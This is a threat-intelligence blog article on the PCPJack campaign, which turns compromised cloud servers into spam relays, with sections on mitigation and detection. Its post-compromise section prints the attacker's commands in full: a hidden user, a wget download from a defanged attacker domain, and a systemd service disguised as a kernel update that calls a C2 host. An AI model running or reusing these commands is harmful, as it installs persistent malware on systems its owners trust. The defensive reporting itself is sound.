A sophisticated threat actor known as PCPJack has compromised over 230 cloud servers across AWS, Google Cloud Platform, and Microsoft Azure to establish an underground SMTP relay network. The operation leverages misconfigured cloud instances and exposed credentials to transform legitimate infrastructure into spam distribution nodes. Organizations with cloud deployments face heightened risk of unauthorized resource consumption, reputational damage, and potential involvement in malicious email campaigns. Immediate credential audits and network monitoring are recommended for all cloud environments.
Introduction
Cloud infrastructure has become the backbone of modern digital operations, but its ubiquity also makes it an attractive target for cybercriminals seeking computational resources. In a recently uncovered campaign, the threat actor designated PCPJack has systematically compromised hundreds of cloud servers to build a covert email relay network capable of bypassing traditional spam filters and reputation systems.
This operation represents a concerning evolution in cloud-based attacks, where adversaries no longer focus solely on data exfiltration or cryptocurrency mining. Instead, PCPJack demonstrates how compromised cloud infrastructure can be weaponized for sustained email-based operations, leveraging the inherent trust associated with major cloud service providers to evade detection and maintain operational persistence.
The discovery highlights critical security gaps in cloud deployment practices and underscores the need for enhanced monitoring capabilities that can detect anomalous network behavior beyond traditional intrusion indicators.
Background & Context
SMTP relay abuse is not a new phenomenon, but the cloud-native approach employed by PCPJack marks a significant tactical shift. Traditional spam operations relied on compromised residential computers or rented bulletproof hosting services, both of which carry distinct network signatures that security systems have learned to identify and block.
Cloud service providers present a fundamentally different challenge. Their IP addresses enjoy inherent reputational advantages, as legitimate businesses worldwide depend on AWS, GCP, and Azure for critical communications. Email security systems are inherently more permissive toward messages originating from these trusted networks, creating an ideal camouflage for malicious actors.
PCPJack’s operation specifically targets:
- AWS EC2 instances with exposed management interfaces
- Google Cloud Compute Engine VMs with weak authentication
- Azure Virtual Machines running outdated or misconfigured services
The threat actor exploits a combination of exposed credentials found in public repositories, brute-force attacks against SSH and RDP services, and exploitation of known vulnerabilities in web applications hosted on these instances. Once access is established, PCPJack deploys custom SMTP relay software designed to operate with minimal resource footprint, avoiding detection through conventional performance monitoring.
Technical Breakdown
The PCPJack compromise chain follows a multi-stage infection process optimized for stealth and persistence.
Initial Access Vector:
The primary compromise methods include:
- Scanning for exposed cloud metadata endpoints
- Credential stuffing attacks using leaked API keys from GitHub and GitLab
- Exploitation of vulnerable web applications to gain foothold access
- SSH brute-forcing against instances with permissive security groups
Post-Compromise Activities:
Once initial access is achieved, PCPJack executes the following actions:
# Create dedicated user for persistence
useradd -M -s /bin/bash smtpd_relay
echo "smtpd_relay:$(openssl rand -base64 32)" | chpasswd
# Download and install SMTP relay binary
wget -O /tmp/.sysupd hxxp://pcpjack-infra[.]net/relay_agent
chmod +x /tmp/.sysupd
mv /tmp/.sysupd /usr/local/bin/.sysupd
# Establish persistence via systemd
cat > /etc/systemd/system/sys-kernel-updates.service << EOF
[Unit]
Description=Kernel Update Service
After=network.target
[Service]
Type=simple
User=smtpd_relay
ExecStart=/usr/local/bin/.sysupd -c hxxps://c2-relay[.]net
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable sys-kernel-updates.service
systemctl start sys-kernel-updates.service
Network Configuration:
The relay agent establishes encrypted command-and-control channels using TLS-wrapped connections to infrastructure masquerading as legitimate content delivery networks. Email relay requests arrive through these C2 channels, with the compromised instances serving as proxies that legitimize the source IP addresses.
The SMTP relay operates on non-standard ports (typically 2525, 587, or dynamically assigned high ports) to avoid direct detection of SMTP traffic on port 25. Email content is received pre-formatted from the C2 infrastructure, relayed through the compromised instance, and delivered to recipient mail servers that trust the cloud provider’s IP reputation.
Obfuscation Techniques:
- Process naming mimics legitimate system services (
kworker,systemd-journal,update-notifier) - Network connections maintain low volume to avoid triggering bandwidth alerts
- CPU utilization remains below monitoring thresholds (typically <15%)
- Log file manipulation removes evidence of unauthorized authentication
Impact & Risk Assessment
The PCPJack operation poses multiple threat vectors across technical, operational, and reputational dimensions.
Financial Impact:
Compromised organizations face unexpected cloud resource consumption costs. While individual relay operations consume minimal resources, collective unauthorized usage across multiple instances can generate substantial unexpected charges. Organizations with hundreds of cloud instances may not immediately notice slight increases in network egress costs until monthly billing reviews.
Reputational Damage:
The most significant risk involves IP reputation degradation. When compromised instances are identified as spam sources, cloud provider IP ranges may be blacklisted by email security services. This impacts not only the compromised organization but potentially thousands of legitimate organizations sharing the same IP space, creating cascading deliverability issues.
Regulatory and Compliance Consequences:
Organizations in regulated industries face additional risks. Unauthorized email relay constitutes a security control failure under frameworks including SOC 2, ISO 27001, and PCI DSS. Breach notification requirements may be triggered depending on jurisdiction and the nature of relayed content, particularly if the infrastructure is used for phishing campaigns targeting other organizations.
Secondary Exploitation Risks:
Initial compromise for SMTP relay purposes establishes persistent access that can be leveraged for additional malicious activities, including:
- Lateral movement to other cloud resources
- Data exfiltration from accessible storage services
- Deployment of cryptomining malware
- Establishment of infrastructure for subsequent attacks
Vendor Response
Major cloud service providers have acknowledged the PCPJack campaign and implemented detection measures across their platforms.
Amazon Web Services:
AWS Security has enhanced GuardDuty detection capabilities to identify anomalous SMTP traffic patterns and unauthorized service deployments. Customers are advised to review CloudTrail logs for unexpected EC2 instance modifications and unusual network traffic to external SMTP destinations.
Google Cloud Platform:
Google’s Security Command Center has updated threat detection rules to flag suspicious systemd service creations and outbound connections to known PCPJack infrastructure. GCP recommends enabling VPC Flow Logs and reviewing firewall rules for overly permissive egress policies.
Microsoft Azure:
Azure Security Center has deployed custom detection analytics for identifying PCPJack indicators of compromise. Microsoft advises customers to review Azure Activity Logs for unexpected VM modifications and enable Microsoft Defender for Cloud for enhanced threat detection.
All three providers have begun proactive customer notifications for accounts showing indicators consistent with PCPJack compromise patterns.
Mitigations & Workarounds
Immediate defensive actions should focus on credential security, network segmentation, and access control hardening.
Credential Management:
# Rotate all API keys and access credentials
aws iam list-access-keys --user-name
aws iam delete-access-key --access-key-id --user-name
aws iam create-access-key --user-name
# Enforce MFA for privileged accounts
aws iam enable-mfa-device --user-name --serial-number --authentication-code1 --authentication-code2
Network Segmentation:
Implement restrictive security group policies that deny outbound SMTP traffic except from explicitly authorized mail relay instances:
{
"IpProtocol": "tcp",
"FromPort": 25,
"ToPort": 25,
"IpRanges": [],
"Description": "Deny all outbound SMTP - explicit allow required"
}Instance Hardening:
- Disable password authentication for SSH access
- Implement key-based authentication with regular rotation
- Apply principle of least privilege to service accounts
- Enable automatic security patching for operating systems
Detection & Monitoring
Effective detection requires multi-layered monitoring across authentication, network, and process execution dimensions.
Authentication Monitoring:
Configure alerts for unusual authentication patterns:
- SSH connections from unexpected geographic locations
- API calls from unfamiliar IP addresses
- Successful authentication after multiple failed attempts
- Service account usage during non-business hours
Network Traffic Analysis:
Deploy monitoring for:
- Outbound connections on ports 25, 465, 587, 2525
- High-volume egress to multiple external mail servers
- Encrypted tunnels to unusual or newly registered domains
- DNS queries for suspicious C2 infrastructure patterns
Process and Service Monitoring:
# Identify suspicious systemd services
systemctl list-units --type=service --state=running | grep -v -E "(systemd|dbus|network|ssh|cron)"
# Review recently modified system directories
find /etc/systemd/system -type f -mtime -7 -ls
find /usr/local/bin -type f -mtime -7 -ls
# Check for processes with suspicious network connections
netstat -tulpn | grep -E ":(25|465|587|2525)"
Cloud-Native Detection:
Leverage cloud provider security services:
- AWS GuardDuty for behavioral threat detection
- Azure Sentinel for SIEM correlation and analysis
- GCP Security Command Center for anomaly identification
Best Practices
Preventing cloud infrastructure compromise requires comprehensive security hygiene across the deployment lifecycle.
Secure-by-Default Configurations:
- Implement infrastructure-as-code with security controls embedded
- Use cloud provider security baselines as minimum standards
- Enforce tagging policies for resource ownership and accountability
- Enable encryption in transit and at rest for all services
Credential Security:
- Never commit credentials to source code repositories
- Utilize cloud-native secret management services (AWS Secrets Manager, Azure Key Vault, GCP Secret Manager)
- Implement automatic credential rotation policies
- Scan repositories for accidentally committed secrets using tools like git-secrets or truffleHog
Network Architecture:
- Default-deny egress policies with explicit allow lists
- Segment cloud environments by trust zones and sensitivity
- Deploy centralized logging with immutable storage
- Implement network flow monitoring and baseline analysis
Continuous Security Validation:
- Conduct regular vulnerability assessments of cloud instances
- Perform penetration testing of cloud infrastructure
- Review and audit IAM permissions quarterly
- Test incident response procedures for cloud-specific scenarios
Key Takeaways
The PCPJack campaign demonstrates that cloud infrastructure requires security vigilance equal to or exceeding traditional on-premises environments. The inherent trust associated with major cloud providers makes compromised instances particularly valuable to threat actors seeking to evade detection.
Organizations must recognize that cloud security is a shared responsibility model where providers secure the infrastructure, but customers remain responsible for securing their workloads, data, and configurations. Misconfigurations and credential exposure remain the primary attack vectors enabling large-scale compromise operations.
Effective cloud security requires continuous monitoring, rapid detection capabilities, and immediate response to suspicious activities. The traditional perimeter-based security model fails in cloud environments where boundaries are fluid and infrastructure is ephemeral.
Investment in cloud-native security tools, security automation, and security-aware development practices provides the foundation for resilient cloud operations that can withstand targeted compromise attempts.
References
- AWS Security Best Practices: https://aws.amazon.com/security/best-practices/
- Azure Security Baseline: https://docs.microsoft.com/azure/security/fundamentals/
- GCP Security Command Center: https://cloud.google.com/security-command-center
- MITRE ATT&CK Cloud Matrix: https://attack.mitre.org/matrices/enterprise/cloud/
- CIS Cloud Security Benchmarks: https://www.cisecurity.org/cis-benchmarks/
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/
